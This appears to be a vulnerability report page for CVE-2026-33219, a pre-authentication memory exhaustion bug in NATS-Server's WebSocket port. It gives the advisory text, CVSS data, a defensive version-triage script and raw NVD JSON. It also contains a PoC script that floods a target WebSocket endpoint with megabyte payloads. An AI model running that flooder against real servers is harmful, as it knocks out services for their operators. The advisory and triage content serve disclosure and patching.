Security Vulnerability Report
CVE-2026-33219 CVSS 5.3 MEDIUM

CVE-2026-33219

Published: 2026-03-25 20:16:33
Last Modified: 2026-03-26 17:15:18

Description

NATS-Server is a high-performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a malicious client that can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data. This is a milder variant of CVE-2026-27571: that earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable websockets if they are not required for the deployment.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server < 2.11.15)
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE (NATS-Server >= 2.12.0, < 2.12.6)
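An added triage helper (not part of this report or of the nats-server project) that encodes the two affected ranges above and the advisory's workaround, so an inventory script can sort hosts into patched, vulnerable, and mitigated-by-disabled-websockets. The inventory rows and the `websocket_enabled` flag are constructed inputs; the version strings mimic the `nats-server: vX.Y.Z` form, which is an assumption about the binary's `--version` output.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges exactly as the CPE configuration above states them:
# (start inclusive, or None for "any earlier version"; end exclusive).
AFFECTED_RANGES = [
    (None, (2, 11, 15)),        # NATS-Server < 2.11.15
    ((2, 12, 0), (2, 12, 6)),   # NATS-Server >= 2.12.0, < 2.12.6
]


def parse_version(text: str) -> Optional[Version]:
    """Pull (major, minor, patch) out of 'v2.12.3', '2.12.3' or a longer
    line such as 'nats-server: v2.11.14'. Returns None if nothing matches."""
    m = re.search(r"\bv?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_affected(version: Version) -> bool:
    """True when the version lies inside one of the advisory's ranges."""
    for start, end in AFFECTED_RANGES:
        if (start is None or version >= start) and version < end:
            return True
    return False


def assess(version_text: str, websocket_enabled: bool) -> str:
    """Triage verdict for one host. The bug is only reachable through the
    WebSocket listener, so a deployment with that listener disabled is
    covered by the advisory's workaround until it is upgraded."""
    version = parse_version(version_text)
    if version is None:
        return "unknown-version"
    if not is_affected(version):
        return "not-affected"
    return "vulnerable" if websocket_enabled else "mitigated-by-workaround"


if __name__ == "__main__":
    # Constructed inventory rows: (hostname, version output, websocket on?)
    inventory = [
        ("mq-01", "nats-server: v2.11.14", True),
        ("mq-02", "nats-server: v2.12.0", False),
        ("mq-03", "v2.12.6", True),
        ("mq-04", "2.11.15", True),
    ]
    for host, ver, ws in inventory:
        print(f"{host:6} {ver:24} -> {assess(ver, ws)}")
```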

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import websockets


async def exploit_memory_exhaustion(uri):
    """
    PoC for CVE-2026-33219
    Connects to NATS WebSocket port and sends large amounts of data
    to trigger unbounded memory use before authentication.
    """
    try:
        # Connect to the target WebSocket port (default 8080 or 4222 depending on config)
        async with websockets.connect(uri) as websocket:
            print(f"[+] Connected to {uri}")
            # Create a large payload to consume memory
            # Note: Actual exploitation requires sustained data transmission
            payload = "A" * 1024 * 1024  # 1MB chunk
            counter = 0
            while True:
                try:
                    await websocket.send(payload)
                    counter += 1
                    if counter % 10 == 0:
                        print(f"[+] Sent {counter} MB of data...")
                except Exception as e:
                    print(f"[-] Connection error or server crashed: {e}")
                    break
    except Exception as e:
        print(f"[-] Failed to connect: {e}")


# Target URI needs to be the WebSocket monitor/listener port
# Example: asyncio.run(exploit_memory_exhaustion("ws://192.168.1.100:8080"))
```

References

https://advisories.nats.io/CVE/secnote-2026-02.txt (Mitigation, Vendor Advisory)
https://advisories.nats.io/CVE/secnote-2026-11.txt (Mitigation, Vendor Advisory)
https://github.com/advisories/GHSA-qrvq-68c2-7grw (Mitigation, Vendor Advisory)
https://github.com/nats-io/nats-server/security/advisories/GHSA-8r68-gvr4-jh7j (Mitigation, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33219", "sourceIdentifier": "[email protected]", "published": "2026-03-25T20:16:32.777", "lastModified": "2026-03-26T17:15:18.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data. This is a milder variant of CVE-2026-27571. That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable websockets if not required for project deployment."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, un cliente malicioso que puede conectarse al puerto de WebSockets puede causar un uso de memoria ilimitado en el nats-server antes de la autenticación; esto requiere el envío de una cantidad de datos correspondiente. Esta es una variante más leve de CVE-2026-27571. Ese problema anterior era una bomba de compresión, esta vulnerabilidad no lo es. Los ataques contra este nuevo problema, por lo tanto, requieren un ancho de banda significativo del cliente. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, deshabilite los websockets si no son necesarios para la implementación del proyecto."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-02.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://advisories.nats.io/CVE/secnote-2026-11.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/advisories/GHSA-qrvq-68c2-7grw", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-8r68-gvr4-jh7j", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
```